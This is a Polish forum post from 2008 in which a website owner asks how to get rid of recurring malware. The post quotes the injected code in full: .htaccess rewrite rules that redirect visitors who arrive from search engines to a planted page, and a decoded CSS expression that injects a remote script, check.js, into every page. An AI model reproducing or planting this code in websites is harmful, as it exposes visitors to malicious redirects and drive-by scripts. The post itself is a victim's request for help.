Mam wirusa na WWW, jak się go pozbyć

Mam wirusa na WWW, jak się go pozbyć, Jakiś malware-gen, proszę o pomoc

Tomplus Zobacz profil	27.03.2008, 23:05:33 Post #1
Grupa: Zarejestrowani Postów: 1 879 Pomógł: 230 Dołączył: 20.03.2005 Skąd: Będzin Ostrzeżenie: (0%)	Witam, Prowadzę stronę www.swos.pl Ostatnio walczę z wirusem malware-gen, o którym informuje AVAST i to nie jest problem który wyjasnianiają w tym wątku http://prvforum.prv.pl/viewtopic.php?t=15553 tutaj jest fota z antywirusa Oczywiscie mój anti nie wykrywa go, jednakze to nie znaczy ze go nie ma. Wirus jest specyficzny bo bez naruszenia daty dodaje kod: do plików .htaccess, do wszystkich jakie znajduje na I i II poziomie roota CODE # a0b4df006e02184c60dbf503e71c87ad RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)(google\|msn\|yahoo\|live\|ask\|dogpile\|mywebsearch\|yandex\|rambler\|aport\|mail gogo\|poisk\|alltheweb\|f ireball\|freenet\|abacho\|wanadoo\|free\|club-internet\|aliceadsl\|alice\|skynet\|terra\|ya\|orange\|clix\|terravista\|gratis-ting\|suomi24)\. [NC] RewriteCond %{HTTP_REFERER} [?&](q\|query\|qs\|searchfor\|search_for\|w\|p\|r\|key\|keywords\|search_string\|search_wo d\|buscar\|text\|words\|su\|q t\|rdata)\= RewriteCond %{HTTP_REFERER} ![?&](q\|query\|qs\|searchfor\|search_for\|w\|p\|r\|key\|keywords\|search_string\|search_wo d\|buscar\|text\|words\|su\|q t\|rdata)\=[^&]+(%3A\|%22) RewriteCond %{TIME_SEC} <59 RewriteRule ^.$ /swospl/gfx/arutab/ex3/t.htm [L] # a995d2cc661fa72452472e9554b5520c oraz analogicznie tylko do plików arkusza stylów CSS kod CODE /0b4df006e02184c60dbf503e71c87ad / body { margin-top: expression(eval(unescape('if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 157763; JSS3 = '/swospl/gfx/arutab/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/swospl/gfx/arutab/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) }; '))) } /* a995d2cc661fa72452472e9554b5520c */ to powyższe jest z dekodowane, bo inaczej człowiek by nic nie odczytał. Po nitce do kłębka znalazłem nie proszony katalog ARUTAB i usunąłem. W tym roku poraz 3 pojawia się ten katalog i nie wiadomo dlaczego zmienia style css i .htaccess strona ogólnie nie zmienia się nic, a nic wszystko działa jak należy, ale .... nie podoba mi się taki nie proszony gosć i skąd się wziął. Dostęp do konta mają tylko 2 osoby. Po poprzedniej takim incydencie skasowałem pliki js i sprawdziłem wszystkie pliki kasując w css i ht szkoliwy kod i skontrolowałem pliki js i php na całym serwerze. Nic nie znalazłem. Jednakże dzisiaj pojawił się ponowanie i znowu musiałem sprzątać. Będę wdzięczny za rozwiązanie. - prawdopodobne rozwiązanie jest w http://forums.devshed.com/apache-developme...y-512348-2.html jednakże zupełnie nie rozumie dyskusji, w większości przekracza moje kompetencje językowe.